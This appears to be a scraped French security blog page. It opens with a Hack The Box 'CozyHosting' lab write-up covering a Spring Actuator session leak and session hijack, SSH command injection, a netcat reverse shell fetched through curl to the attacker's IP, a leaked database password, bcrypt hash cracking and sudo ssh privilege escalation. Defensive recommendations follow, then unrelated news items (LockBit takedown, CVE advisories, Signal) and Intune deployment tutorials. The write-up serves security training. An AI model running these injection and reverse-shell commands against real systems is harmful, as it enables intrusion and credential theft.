En étudiant les possibilités et point d'entrés d'Actuator, on remarque vite qu'il peut fournir à celui qui y accède un grand nombre d'informations sur l'application qu'il gère ou le serveur qui l'héberge. Le point d'entrée "/actuator/mappings" liste tous les points d'entrés disponibles :
On remarque notamment le point d'entrée "/actuator/session", toujours intéressant pour un visiteur anonyme :
Sans aucune authentification et en quelques requêtes, nous parvenons à récupérer un jeton de session valide sur la plateforme ciblée.
Lors d'une authentification réussie, l'application web fournit, en échange de la preuve (mot de passe) de l’identité déclarée (login), un jeton de session. Cela évite ainsi à l'utilisateur de s'authentifier sur chaque changement de page. Ce jeton de session sera unique par utilisateur et pour chaque connexion, avec une durée de vie limitée. Ainsi, le fait de fournir cette donnée unique à chaque requête plutôt que nos identifiants, permet au serveur de suivre notre session et de nous maintenir authentifié lors de la navigation.
Sur l'application web, on remarque notamment que si l'on tente une authentification sur la page "/login", un "JSESSIONID" nous est attribué :
Le menu que vous voyez apparaitre en bas de la capture d'écran ci-dessus est la barre développeur de Firefox. Il s'agit d'un outil présent sur tous les navigateurs récents. Elle propose un ensemble d'outils intégrés permettant aux développeurs web d'inspecter et de déboguer les pages et les échanges, ainsi que d'analyser les performances du site en temps réel. Elle offre des fonctionnalités telles que l'inspection d'éléments HTML, la modification en direct du CSS, le débogage JavaScript, le suivi du réseau et la mesure des performances.
Cela nous permet d'obtenir le nom du cookie à utiliser, il faut ensuite remplacer son contenu par l'un des jetons de l’utilisateur "kanderson" récupéré plus haut.
Après modification de notre cookie, nous devons rafraichir la page pour que le serveur web comprenne que nous sommes authentifiés. Nous voilà ainsi sur le point d'entrée "/admin" en tant que l'utilisateur "K. Anderson". Nous venons d'effectuer un vol de session ! Sans connaissance du mot de passe de l'utilisateur, nous récupérons l'élément qui permet à l'application web de suivre sa session.
C. RCE (Remote Commande Execution)
Nous pouvons à présent parcourir l'espace authentifié de l'application web. Cette fonctionnalité parait notamment intéressante :
Visiblement, nous pouvons spécifier un nom d'hôte et un nom d'utilisateur pour que l'application web s'y connecte. Autre fait intéressant, si l'on saisie des données qui ne sont pas conformes à ce que pourrait attendre ce genre de fonctionnalité, le contenu de l'aide de la commande SSH est retourné par l'application web :
Cela indique explicitement qu'une commande système est exécutée à l'aide des informations que nous saisissons.
Lorsque de la réalisation d'une attaque sur une application web, la saisie de données non conformes ou mal formatées est l'une des opérations de base à réaliser. Cela permet de voir si l'application web ciblée a été correctement développée afin de gérer les entrées utilisateurs, et notamment de s'assurer que celles-ci sont conformes à ce qui est attendu d'un point de vue logique (présence de caractères spéciaux dans un nom de domaine ?) ou métier (l'adresse mail saisie existe-t-elle vraiment ? Prix négatif ?).
L'objectif de l'attaquant est alors de tenter de faire apparaitre des erreurs, parfois verbeuses, pouvant faire fuiter des informations (framework/technologie utilisée, contexte d'exécution) ou trahir un manque de filtrage ou de contrôle des entrées utilisateur.
Ainsi, nous savons à présent que nos entrées sont insérées dans une commande système (Bash), et non plus simplement dans une variable d'un langage de développement web (PHP, Java, autre) ou une base de données. C'est une information très intéressante pour un attaquant, car s'il parvient à manipuler correctement cette commande, il pourra exécuter ses propres commandes sur le système.
Supposons que nos entrées "host" et "username" soient insérées dans une commande SSH comme celle-ci :
ssh username@host
Alors, nous pourrions insérer n’importe quelle commande dans cette commande SSH à l'aide d'une variable "host" comme celle-ci :
host = 127.0.0.1;whoami
username = john
ssh john@127.0.0.1;whoami
Tentons de vérifier notre hypothèse :
Cela ne fonctionne pas, l'application web semble vérifier la cohérence du paramètre "hostname" reçu. Voyons si c'est également le cas avec le "username" :
Si l'on regarde attentivement le message d'erreur, nous comprenons qu'il s'agit en fait de deux messages distincts. Cela valide notre supposition initiale, au moins pour le paramètre "username". Voici précisément ce que donne notre injection
ssh john;[email protected]
# Détail des message d'erreurs
ssh john # ssh : Could not resolve hostname john : Temporary failure in name resolution
[email protected] # /bin/bash: line1 : [email protected]: command not found
Étant donné que nous avons inséré un caractère de chainage de commande sous Linux (le point-virgule), nous avons maintenant deux commandes. Cependant, aucune des deux n'est réellement valide. Maintenant que nous avons validé la possibilité d'une injection de commande, nous devons produire quelque chose d'utile et de fonctionnel pour un attaquant. Au moins une de nos deux commandes doit pouvoir être exécutée sans erreurs.
Je décide d'utiliser pour cela une substitution de commande, qui permet sous Linux d'utiliser le résultat d'une commande comme argument pour une autre commande :
# Poste attaquant
# Création d'un script reverse shell
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.162 9001 >/tmp/f" > x
# Mise en en écoute d'un service web
python3 -m http.server
# Mise en écoute d'un netcat (port 9001)
$ nc -lvp 9001
Mon idée ici est de générer le téléchargement, puis l'exécution d'un script Bash qui contient des instructions pour monter un reverse shell en direction de mon système d'attaque.
Un reverse shell est une suite d'intrusion exécutée pour qu'un système compromis se connecte à un serveur distant contrôlé par l'attaquant, permettant ainsi à ce dernier d'obtenir un accès à distance à la machine compromise. Cette technique est souvent utilisée pour contourner les pare-feu et établir une communication secrète, rarement journalisée (à l'inverse d'une connexion SSH par exemple).
Voici la requête web utilisée pour l'exploitation :
Ici, on voit la substitution à l'intérieur du "$( )". Le système Linux va d'abord "résoudre" cette substitution avant d'insérer le résultat de la commande dans le "username" de la commande SSH. Vous noterez également la présence d'un "${IFS}", qui permet d'insérer un espace sans utiliser l'espace. Ainsi, même si le "username" de la commande SSH est mal formaté et entraîne une erreur, la substitution sera exécutée avant et l'erreur de la commande SSH n'aura aucun impact sur mon exploitation.
Enfin, le fait d'utiliser "curl http://IP/script|bash" permet de télécharger et exécuter un script Bash sans dépôt sur le système. J'utilise cette astuce pour éviter de m'embêter avec les nombreux caractères spéciaux de ma commande reverse shell, qui peuvent être à manipuler correctement pour passer l'encodage/décodage par le client, le service et l'application web.
# Récepetion du reverse shell sur le poste attaquant
$ nc -lvp 9001
connect to [10.10.14.162] from cozyhosting.htb [10.10.11.230] 42102
app@cozyhosting:/app$
À présent, nous avons à notre disposition un shell interactif en tant que l'utilisateur "app" le serveur attaqué.
Nous venons de le voir, les attaque de type RCE (Remote Command Execution) sont parmi les plus critiques qui puissent exister au sein d'une application web. Elles permettent d'exécuter du code sur un serveur web qui héberge l'application web, avec les droits du service web. Ainsi, nous pouvons nous affranchir des limitations imposées par nos droits applicatifs ou les fonctionnalités de l'application.
D. Récupération d'identifiants
Nous avons un premier accès au serveur, pour aller jusqu'au bout, nous devons passer root ! Nous pouvons simplement commencer par quelques opérations de découverte basique sur le serveur :
Quels sont nos droits et groupes ?
app@cozyhosting:/app$ id
id
uid=1001(app) gid=1001(app) groups=1001(app)
Existe-t-il des services accessibles qu'en interne ?
netstat -petulan |grep "LISTEN" |grep "127.0.0"
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 102 21525 -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 114 22278 -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN 1001 23652 1065/java
Quels fichiers intéressants pouvons-nous lire ?
app@cozyhosting:/app$ ls -al
ls -al
total 58856
drwxr-xr-x 2 root root 4096 Aug 14 14:11 .
drwxr-xr-x 19 root root 4096 Aug 14 14:11 ..
-rw-r--r-- 1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar
Après quelques recherches, je découvre le fichier "cloudhosting-0.0.1.jar", il s'agit probablement du site web qui expose le site vitrine vu précédemment. Je décide de l'exfiltrer du serveur pour étude en local :
Une archive JAR est un conteneur de fichiers Java, regroupant des classes et des ressources, facilitant le déploiement et l'exécution d'applications Java. Elle permet de compresser et d'organiser des éléments liés au code source notamment pour favoriser la portabilité et la distribution des programmes .
Une simple recherche via grep dans les fichiers composants de l'archive ".jar" nous permet de retrouver des identifiants correspondants à une base de données :
À la suite de notre découverte des services en écoute interne, nous avons identifié un service PostgreSQL. Nous pouvons probablement nous y authentifier avec les identifiants découverts :
app@cozyhosting:/app$ psql -h 127.0.0.1 -U postgres -c "\list"
psql -h 127.0.0.1 -U postgres -c "\list"
Password for user postgres: Vg&nvzAQ7XxR
Une découverte des bases de données, tables et données accessibles nous permet de découvrir une table intéressante :
Cette table contient deux comptes utilisateur, ainsi que le hash de leur mot de passe.
select * from users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
Nous utilisons à présent John The Ripper pour tenter de casser ces hash à l'aide du dictionnaire de mot de passe rockyou.txt :
$ john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt /tmp/y
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
Le préfixe "$2a$" dans le contexte des hachages de mots de passe fait référence à la version "2a" de l'algorithme de hachage Blowfish utilisé avec la fonction de hachage de mots de passe bcrypt. Mais, c'est une information que John The Ripper sait traiter de façon autonome pour adapter son attaque.
Le cassage de hash de mot de passe bcrypt par dictionnaire avec John the Ripper implique l'utilisation d'une liste de mots prédéfinis (dictionnaire) pour tenter de trouver une correspondance avec les hachages bcrypt. John the Ripper génère les hachages correspondants aux mots du dictionnaire et compare ensuite avec le hash cible. Si les hashs correspondent, alors le hash est considéré comme cassé et l'on connait le mot de passe d'origine.
Bingo ! Nous parvenons à casser le hash du mot de passe de l'utilisateur "admin" !
Étant donné que nous avons un accès au serveur, nous pouvons accéder en lecture au fichier "/etc/passwd", ce qui nous permettra d'avoir une liste d'utilisateur sur lequel tester notre mot de passe :
Nous pouvons maintenant, entre autres, lister les dérogations d'exécution via sudo accordées à cet utilisateur :
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
(root) /usr/bin/ssh *
Intéressant, cet utilisateur peut exécuter la commande SSH en tant que root. Nous pouvons utiliser la ressource gtfobins.sh pour connaitre les éventuels abus existant sur cette commande : https://gtfobins.github.io/gtfobins/ssh/#sudo
Nous pouvons visiblement utiliser l'option "Proxycommand" pour exécuter une commande en tant que root. L'option ProxyCommand dans la commande SSH permet de spécifier une commande qui sera utilisée pour établir une connexion à un hôte distant. Elle est utile pour traverser un proxy/rebond avant d'atteindre la destination finale. Ici, nous utiliserons l'option pour avoir un shell interactif, encore une fois grâce à un chainage de commande :
Une fois de plus, nous parvenons à abuser de la dérogation de droit sudo pour exécuter autre chose que la commande autorisée. Cela nous permet d'obtenir les droits root sur le serveur.
III. Résumé de l'attaque
Voici une description de l'attaque réalisée en utilisant les TTP (Tactics, Techniques and Procedures) du framework MITRE ATT&CK :
Abus de la dérogation de droits sudo accordée à l'utilisateur josh sur la commande SSH.
IV. Notions abordées
A. Côté attaquant
L'utilisation de nuclei nous a fait gagner un temps certains ici. Bien qu'il ne soit pas du tout recommandé de baser notre analyse et nos tests uniquement sur ce genre d'outils automatisés, il faut savoir en tirer parti, car ils présentent certains avantages. Notamment, ils peuvent rapidement tester des éléments très spécifiques autour d'une CVE (même ancienne) ou d'une mauvaise configuration. Ils peuvent aussi passer à côté de vulnérabilité très basiques qui dépendent plus du contexte applicatif. Il faut donc utiliser ces outils intelligemment...
Nous avons également vu dans cet exercice la dangerosité des vulnérabilités de type RCE (Remote Command Execution) et un exemple scolaire d'exploitation de celle-ci. Si l'on s'intéresse au code applicatif ayant mené à cette vulnérabilité (car nous avons l'archive ".jar" à présent), nous pouvons retrouver le code suivant :
Nous voyons ici l'utilisation de "Runtime.getRuntime().exec()" pour exécuter des commandes système en Java. Également, on remarque les fonctions "validateUserName", qui vérifie simplement la présence d'un espace, et "validateHost", qui repose sur une expression régulière et un pattern plus complexe (je n'ai pas précisément étudié le pattern), ce qui correspond à nos observations "boite noire" (sans le code sous les yeux).
B. Côté défenseur
Pour sécuriser ce système, nous pouvons proposer plusieurs recommandations :
Recommandation n°1 : la première recommandation est bien sûr de rendre inaccessible le point d'entrée "Actuator" aux visiteurs non authentifiés. Ce genre d'information ne doit être visibles qu'aux développeurs. Si celles-ci ne sont pas activement utilisées, il est recommandé de désactiver "Springboot Actuator" sur les environnements en production.
Recommandation n°2 : il est recommandé de renforcer la sécurité applicative, et notamment le contrôle des entrées utilisateurs sur la fonctionnalité "/executessh". La fonction "validateUsername" doit vérifier l'absence de tout caractère spécial susceptible de causer des erreurs ou d'être utilisés pour du chainage et de la substitution de commande. Des ressources de l'OWASP peuvent ici être mises en référence (OS Command Injection Defense Cheat Sheet, OWASP Testing Guide v4.2 - Testing for Command Injection). Pour prendre un peu de recul, la mise en place d'un pare-feu applicatif (WAF ou Web Application Firewall) peut également être recommandée. Celui-ci, s'il est bien configuré, permettra de freiner la démarche de l'attaquant sur les exploitations basiques telles qu'observées ici, voire de lever l'alerte auprès des équipes de sécurité.
Recommandation n°3 : la troisième recommandation porte encore une fois sur "sudo". Si non justifiée par un besoin métier, il est recommandé de supprimer la dérogation "sudo" en place, car la commande concernée peut être utilisée pour exécuter d'autres commandes avec les droits "root". Si elle est justifiée par un besoin métier, il peut être recommandé de passer un script ou un binaire (non modifiable bien entendu) qui restreindra l'utilisation des options de la commande SSH, voir contiendra uniquement quelques commandes pré-enregistrées. L'essentiel est de réduire la marge de manœuvre de l'utilisateur sur l'utilisation de la commande SSH. Le chapitre "6.3 Contrôle d'accès" du guide Recommandations de sécurité relatives à un système GNU/Linux de l'ANSSI contient un ensemble de bonnes pratiques autour de la configuration sudo.
J’espère que cet article vous a plu ! N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord!
Enfin, si vous voulez accéder à des cours et modules dédiés aux techniques offensives ou défensives et améliorer vos compétences en cybersécurité, je vous oriente vers Hack The Box Academy, utilisez ce lien d'inscription (je gagnerai quelques points ) : Tester Hack the Box Academy
Nous ne sommes qu'au mois de février, et pourtant, il pourrait déjà s'agir du coup de l'année sur la scène de la cybersécurité ! Les autorités sont parvenues à mettre hors ligne le site de LockBit, qui est probablement le gang de cybercriminels le plus actif depuis plusieurs années. Faisons le point sur cette intervention !
Depuis le 19 février 2024, le site du gang de ransomware LockBit a été mis hors ligne ! Il était utilisé par les pirates comme vitrine puisqu'il servait à publier les noms des victimes, mais également les montants des rançons et les données volées dans le cadre des attaques.
Désormais, le site de LockBit ressemble à ceci :
Source : BleepingComputer
La National Crime Agency du Royaume-Uni s'est exprimée sur le sujet : "La NCA peut confirmer que les services de LockBit ont été interrompus à la suite d'une action internationale. Il s'agit d'une opération en cours et en développement."
En effet, les forces de l'ordre et organismes de 11 pays sont à l'origine de cette opération, nommée officiellement l'opération Cronos et menée à l'internationale. En effet, la France a participé par l'intermédiaire de la Gendarmerie Nationale, mais elle n'était pas seule puisque le FBI était aussi de la partie, accompagné par l'Allemagne, le Japon, la Suède, le Canada, ou encore la Suisse.
D'après le membre LockBitSupp, qui serait à la tête de LockBit et qui s'est exprimé par l'intermédiaire du service de messagerie Tox, le FBI est parvenu à accéder aux serveurs de LockBit à l'aide d'un exploit PHP. Les forces de l'ordre sont également parvenues à mettre hors ligne l'interface dédiée aux affiliés de LockBit. Un message indique que le code source de LockBit a pu être saisi (celui du ransomware ?), ainsi que des conversations et des informations sur les victimes.
Pour rappel, le gang de ransomware LockBit est à l'origine de plusieurs grandes cyberattaques, y compris en France :
Reste à savoir quel sera l'impact réel de cette opération sur les activités malveillantes menées par le gang de cybercriminels LockBit. N'oublions pas que LockBit est une véritable organisation criminelle, très bien organisée, avec des processus clairs, etc...
Les autorités devraient s'exprimer prochainement sur le sujet. Nous pouvons les féliciter pour cet excellent travail effectué dans la lutte contre le cybercrime !
L'énorme coup réalisé par les forces de l'ordre dans le cadre de l'opération Cronos se confirme : les clés de déchiffrement pour le ransomware LockBit sont entre les mains des autorités, ce qui va permettre de déchiffrer les données gratuitement !
L'opération Cronos est véritablement un coup d'arrêt pour le gang de cybercriminels LockBit. Au-delà d'être parvenu à arrêter les serveurs associés au site vitrine des malfaiteurs, les autorités sont parvenues à récupérer le code source du ransomware LockBit. Cette information a été confirmée par la National Crime Agency (NCA) du Royaume-Uni.
Comme on pouvait s'y attendre, d'autres détails sur cette intervention commencent à être diffusés. Tout d'abord, il faut savoir que les autorités ont pu arrêter 2 membres de LockBit en Pologne et en Ukraine. À cela s'ajoutent le gel de 200 comptes de crypto-monnaie liés au groupe de cybercriminels.
Un outil de déchiffrement est disponible !
Les autorités ont pu arrêter 34 serveurs utilisés par le gang de ransomware LockBit, sur lesquels ils sont parvenus à obtenir plus de 1 000 clés de déchiffrement ! Il s'agit d'une information capitale ! En effet, les autorités sont parvenues à créer un outil de déchiffrement pour LockBit 3.0 !
Le rapport mis en ligne par Europol précise : "Avec le soutien d'Europol, la police japonaise, la National Crime Agency et le Federal Bureau of Investigation ont concentré leur expertise technique pour développer des outils de déchiffrement destinés à récupérer les fichiers chiffrés par le ransomware LockBit".
Cet outil de déchiffrement pour LockBit 3.0 est disponible sur le site "No More Ransom" ! Il doit permettre la récupération des données chiffrées par le ransomware LockBit 3.0 sans avoir à payer la rançon ! D'après un rapport d'Eurojust : "Les attaques de LockBit auraient touché plus de 2 500 victimes dans le monde entier."
Dans ce tutoriel, nous allons apprendre à déployer une application au format MSI sur des appareils Windows 10 ou Windows 11, à l'aide de la solution Intune. Le format MSI est très apprécié par les administrateurs systèmes, car il permet de faciliter l'installation silencieuse des applications, contrairement au format EXE.
Sur les appareils Windows, Intune est capable de déployer des applications de différents types, notamment celles au format MSI par l'intermédiaire de ce qui est appelé les Applications métiers, Line-of-business app ou encore LOB app.
Pour être plus précis, la fonction de déploiement d'une application métier sur les appareils Windows proposée par Intune prend en charge les formats de fichiers suivants : .msi, .appx, .appxbundle, .msix et .msixbundle. Ceci pourra être utile pour les entreprises qui font eux-mêmes le packaging de certaines applications.
Note : vous pouvez également utiliser la méthode "Application Win32" pour créer un package intunewin qui contient un package MSI. Ceci permet d'avoir plus de souplesse, notamment pour s'appuyer sur un script de détection.
II. Télécharger les sources de l'application (7-Zip)
Pour cette démonstration, nous allons voir comment déployer l'application 7-Zip sur Windows à l'aide d'Intune. Vous pouvez utiliser une autre application telle que Google Chrome, via cette méthode. Si vous décidez de déployer Mozilla Firefox, utilisez plutôt la méthode "Application Win32", car avec cette méthode, il y a un problème de détection de la version.
Vous pourrez trouver le package MSI sur cette page :
Ensuite, nous devons identifier le nom du commutateur permettant d'effectuer l'installation silencieuse. Avec un package MSI, en règle général, il s'agit de l'un de ces commutateurs :
<nom du package>.msi /quiet
<nom du package>.msi /silent
<nom du package>.msi /S
<nom du package>.msi /q
Dans le cas présent, la bonne valeur est "/quiet" comme le montre l'aide associée à ce package MSI. Sinon, une recherche sur Internet, notamment sur le site de l'éditeur, peut permettre d'obtenir la bonne valeur.
Désormais, nous allons pouvoir passer sur le portail Intune.
III. Créer une application métier dans Intune
Connectez-vous le portail d'administration d'Intune et créez une nouvelle application métier :
Une fois connecté au portail Intune, naviguez sur l'interface de cette façon :
1 - Cliquez sur "Applications", puis "Windows".
2 - Cliquez sur le bouton "Ajouter".
3 - Un panneau latéral s'ouvre. Choisissez "Application métier" comme type d'application.
4 - Cliquez sur "Sélectionner".
À l'étape suivante :
1 - Cliquez sur le lien "Sélectionner un fichier de package d'application".
2 - Chargez le package MSI de 7-Zip, ou d'une autre application selon vos besoins.
3 - Cliquez sur "OK".
B. Informations sur l'application
L'étape "Informations sur l'application" sert à personnaliser le déploiement de l'application. Au-delà de pouvoir personnaliser le nom et la description, nous devons préciser le nom de l'éditeur, mais pas que ! En effet, j'attire votre attention sur les options suivantes :
Contexte d'installation d'application : cette application sera installée au niveau de la machine et sera disponible pour tous les utilisateurs. Dans certains cas, et selon le package MSI, cette option peut être grisée (avec une valeur prédéfinie).
Ignorer la version de l'application : cette option permet de ne pas tenir compte de la version de l'application, ce qui est utile pour les applications qui vont se mettre à jour automatiquement, comme Google Chrome.
Arguments de ligne de commande : c'est ici qu'il faut indiquer le(s) argument(s) associés à l'installation du package. Vous devez au moins indiquer le commutateur permettant d'effectuer une installation silencieuse, soit "/quiet" dans le cas présent.
Ce qui donne :
Cliquez sur "Suivant".
C. Affectations
Pour finir, affectez cette application aux appareils ou aux utilisateurs de votre choix, selon vos besoins. Comme pour les applications au format EXE, nous pouvons rendre cette application obligatoire, la proposer pour les appareils inscrits via le portail d'entreprise ou déclencher la désinstallation. Dans cet exemple, tous les appareils sont sélectionnés, car il s'agit d'un Lab.
Poursuivez jusqu'à la fin et finalisez la création de l'application.
D. Finaliser la création de l'application
Lorsque vous finalisez la création de l'application, le package MSI est chargé sur Microsoft Intune. Ceci peut prendre un peu de temps en fonction de votre débit et de la taille du package.
La nouvelle application apparaît bien dans la liste. Il ne reste plus qu'à tester !
IV. Tester le déploiement de l'application
Direction un appareil affecté par le déploiement de l'application 7-Zip pour faire un essai. Un redémarrage de la machine suffit pour lui demander de rafraichir ses stratégies. Assez rapidement, l'application 7-Zip fait son apparition sur la machine ! Mission accomplie !
V. Conclusion
En suivant ce tutoriel, vous devez être en mesure de déployer 7-Zip ou une autre application sur un ensemble d'appareils Windows 10 et Windows 11 inscrits dans Intune !
Je vous rappelle que le mode de déploiement "Application métier" d'Intune prend en charge plusieurs formats de fichiers : .msi, .appx, .appxbundle, .msix et .msixbundle.
Une faille de sécurité critique a été découverte dans le pilote JDBC de PostgreSQL, ouvrant la porte à des attaques basées sur de l'injection SQL. Faisons le point sur cette menace potentielle.
Pour rappel, le driver JDBC de PostgreSQL peut être utilisé par des applications, notamment en Java, afin de se connecter à une base de données PostgreSQL.
La faille de sécurité CVE-2024-1597 découverte dans le driver JDBC de PostgreSQL (pgjdbc) est associée à un score CVSS de 10 sur 10, ce qui la note maximale. L'injection SQL est envisageable à condition que le mode "PreferQueryMode=SIMPLE" soit actif, ce qui n'est pas le cas par défaut. Si ce mode n'est pas utilisé, alors la vulnérabilité ne peut pas être exploitée. C'est un détail qui a son importance, et cette condition doit être respectée, au-delà d'utiliser une chaine conçue pour exploiter cette vulnérabilité.
D'après l'auteur de cette découverte, surnommé ElNiak : "Dans des circonstances normales, les requêtes paramétrées constituent une défense solide contre les attaques par injection SQL, car elles garantissent que les données d'entrée sont traitées en tant que données uniquement, et non en tant que partie de la commande SQL." - Dans le cas présent, ces mesures de protection peuvent être contournées, rendant possible l'injection SQL malgré tout.
En exploitant cette vulnérabilité, un attaquant peut espérer accéder à des données sensibles contenues dans la base de données, mais aussi manipuler les données, voire dans le pire des cas, obtenir un contrôle total sur la base de données et sur l'application associée.
Comment se protéger ?
D'après la base de bulletins de sécurité de GitHub, sachez que les versions antérieures à 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9 et 42.2.8 sont concernées par cette faille de sécurité. Donc, vous devez passer sur l'une de ces versions pour vous protéger totalement.
Au-delà d'installer la mise à jour, ElNiak recommande d'adopter les bonnes pratiques suivantes :
Signal est sur le point de lancer une nouvelle fonctionnalité très intéressante et surement attendue des utilisateurs : la possibilité d'utiliser un nom d'utilisateur, ou pseudo si vous préférez, pour se connecter à d'autres personnes. Ceci évite de communiquer son numéro de téléphone.
Cette nouvelle fonctionnalité était dans les tuyaux depuis plusieurs mois : depuis novembre 2023, il est possible de l'essayer en créant un compte sur l'environnement staging de Signal. Désormais, la phase de test est terminée. Cette nouveauté est disponible sur l'infrastructure de production au sein de la version bêta de l'application. Prochainement, elle sera disponible pour tout le monde dans la version stable.
Signal a fait cette annonce par l'intermédiaire d'un tweet mis en ligne sur son compte X officiel : "Nous lançons ces mises à jour pour nos utilisateurs bêta dès maintenant, et nous les activerons bientôt pour tous ceux qui utilisent la dernière version de l'application Signal." - Pour obtenir la version bêta de l'application afin d'utiliser cette nouveauté dès maintenant, vous pouvez vous aider de cette page du support Signal.
Cette fonctionnalité va vous permettre d'associer un nom d'utilisateur à votre compte Signal. Ainsi, vous n'aurez plus à divulguer votre numéro de téléphone, puisqu'à la place, il vous suffira d'indiquer votre nom d'utilisateur. Pour que ce soit encore plus simple, vous aurez également la possibilité de partager un lien d'invitation, ainsi qu'un QR code qu'il suffit de scanner pour vous contacter.
Signal semble offrir la possibilité aux utilisateurs de changer leur pseudo quand il le souhaite, sans imposer de restrictions. Si vous êtes déjà connecté à quelqu'un sur Signal, il pourra toujours voir votre numéro de téléphone s'il l'a déjà enregistré, sinon ce ne sera pas le cas.
La phrase suivante est indiquée dans le journal des modifications de la dernière version bêta de l'application Signal pour mobile : "Votre numéro de téléphone ne sera plus visible par les utilisateurs de la dernière version de Signal, sauf s'ils l'ont enregistré dans les contacts de leur téléphone. Vous pouvez le modifier dans les réglages."
Ici, Signal fait référence aux paramètres de confidentialité, et notamment à un nouveau paramètre qui permettra de contrôler qui peut vous trouver par votre numéro de téléphone sur Signal.
Si vous utilisez VMware vSphere et que VMware Enhanced Authentication Plug-in (EAP) est installé sur votre machine, vous devez le désinstaller dès que possible : il contient deux failles de sécurité qui ne seront pas corrigées par VMware, car c'est un composant en fin de vie. Faisons le point.
VMware a mis en ligne un nouveau bulletin de sécurité pour deux vulnérabilités présentes dans le plugin "VMware Enhanced Authentication". Il s'agit d'un logiciel qui s'installe sur Windows et qui permet de bénéficier d'une authentification transparente sur la console de gestion de vSphere, en s'appuyant sur l'authentification Windows et la fonctionnalité de carte à puce de Windows.
Il est encore utilisé aujourd'hui par des administrateurs systèmes, bien qu'il soit obsolète et en fin de vie depuis mars 2021, suite à la sortie de VMware vCenter Server 7.0 Update 2. "VMware prévoit d'interrompre la prise en charge de l'authentification de session Windows (SSPI) utilisée dans le cadre de l'Enhanced Authentication Plug-in, de la prise en charge des cartes à puce et de RSA SecurID pour vCenter Server.", précise le journal des modifications de cette version.
VMware Enhanced Authentication Plug-in : CVE-2024-22245 et CVE-2024-22250
Il s'agit d'une vulnérabilité critique associée à un score CVSS de 9.6 sur 10. Elle peut être utilisée pour relayer des tickets de service Kerberos. VMware précise qu'un attaquant pourrait un utilisateur cible en "demandant et en relayant des tickets de service pour des Service Principal Names (SPN) arbitraires d'Active Directory".
CVE-2024-22250 :
Il s'agit d'une vulnérabilité importante associée à un score CVSS de 7.8 sur 10 et qui va permettre d'effectuer une élévation de privilèges. Elle peut être exploitée par un attaquant qui dispose déjà d'un accès local non privilégié sur une machine Windows. Grâce à cette vulnérabilité, il peut détourner une session EAP privilégiée lorsqu'elle est initiée par un utilisateur de domaine privilégié sur le même système.
Comment se protéger ?
Il n'y a pas et il n'y aura pas de correctif pour ces deux vulnérabilités. VMware invite les administrateurs systèmes à ne plus utiliser l'EAP, ce qui signifie qu'il faut désinstaller le plugin de votre navigateur et/ou l'application pour Windows associée à un service. Ceci fait référence à "VMware Enhanced Authentication Plug-in 6.7.0" et "VMware Plug-in Service".
Pour vous accompagner dans cette démarche, VMware a mis en ligne un nouvel article de support avec des instructions. En fait, vous pouvez utiliser l'interface graphique de Windows pour désinstaller les applications (méthode classique) ou utiliser les commandes PowerShell suivantes :
Si vous ne pouvez pas faire la désinstallation dans l'immédiat, VMware vous encourage à arrêter et désactiver le service. Voici les commandes fournies :
Pour finir, je tiens à préciser que le composant VMware Enhanced Authentication n'est pas installé par défaut, y compris sur le serveur VMware vCenter.
Si vous avez des interrogations, vous pouvez commenter cet article ou vous référer à la documentation de VMware.
Dans ce tutoriel, nous allons utiliser Microsoft Intune pour déployer le navigateur Google Chrome sur des appareils Windows 10 et Windows 11. Pour cela, nous allons utiliser le package MSI de Google Chrome mis à disposition par Google lui-même.
Précédemment, nous avions vu comment déployer une autre application au format MSI : 7-Zip. Si vous souhaitez en savoir plus sur le déploiement des Applications métiers, Line-of-business app ou encore LOB app, vous pouvez consulter l'article ci-dessous :
Pour rappel, la fonction de déploiement d'une application métier sur les appareils Windows proposée par Intune prend en charge les formats de fichiers suivants : .msi, .appx, .appxbundle, .msix et .msixbundle.
II. Télécharger le package MSI de Google Chrome
La première étape consiste à télécharger le package MSI de Google Chrome puisqu'il va nous permettre de déployer l'application sur les appareils Windows 10 et Windows 11.
Vous pourrez trouver le package MSI de Google Chrome grâce au lien ci-dessous. Choisissez le canal "Stable", puis le type de fichier "MSI" et l'architecture "64 bits" avant de cliquer sur le bouton "Télécharger". Il s'agit d'un paquet d'installation complet (pas un installeur qui récupère les sources sur Internet).
Suite au téléchargement, vous obtenez un fichier d'une centaine de méga-octets nommé "googlechromestandaloneenterprise64.msi". Pour l'installer silencieusement, voici la commande à exécuter :
googlechromestandaloneenterprise64.msi /quiet
Nous allons préciser ce commutateur lors de la création de l'application sur l'interface Intune. D'ailleurs, nous allons pouvoir passer sur le portail Intune dès maintenant...
III. Créer une application métier dans Intune
Connectez-vous le portail d'administration d'Intune et créez une nouvelle application métier :
Une fois connecté au portail Intune, naviguez sur l'interface de cette façon :
1 - Cliquez sur "Applications", puis "Windows".
2 - Cliquez sur le bouton "Ajouter".
3 - Un panneau latéral s'ouvre. Choisissez "Application métier" comme type d'application.
4 - Cliquez sur "Sélectionner".
À l'étape suivante :
1 - Cliquez sur le lien "Sélectionner un fichier de package d'application".
2 - Chargez le package MSI de Google Chrome.
3 - Cliquez sur "OK".
B. Informations sur l'application
L'étape "Informations sur l'application" sert à personnaliser le déploiement de l'application. Au-delà de pouvoir personnaliser le nom et la description, nous devons répondre à un ensemble de "questions".
Concernant le "Contexte d'installation d'application", cette application sera installée au niveau de la machine et sera disponible pour tous les utilisateurs. Comme nous pouvons le constater dans le cas de Chrome, cette option peut être grisée (avec une valeur prédéfinie).
